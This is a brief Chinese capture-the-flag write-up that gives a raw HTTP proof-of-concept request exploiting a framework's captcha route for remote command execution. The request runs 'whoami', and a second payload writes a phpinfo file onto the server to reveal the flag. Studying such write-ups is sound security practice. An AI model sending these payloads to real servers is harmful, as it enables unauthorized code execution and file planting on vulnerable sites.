poc
POST /index.php?s=captcha HTTP/1.1
Host: yuorip
Accept-Encoding: gzip, deflate
Accept: / Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 72
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=whoami
根据之前两题经验,flag必定在phpinfo里面
我们直接将<? phpinfo(); ?> 写入test.php 就行
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo “<? phpinfo(); ?>” > test.php
这里漏洞技术细节(涉及代码段、原理等)我上个链接
https://blog.csdn.net/nicesa/article/details/106247668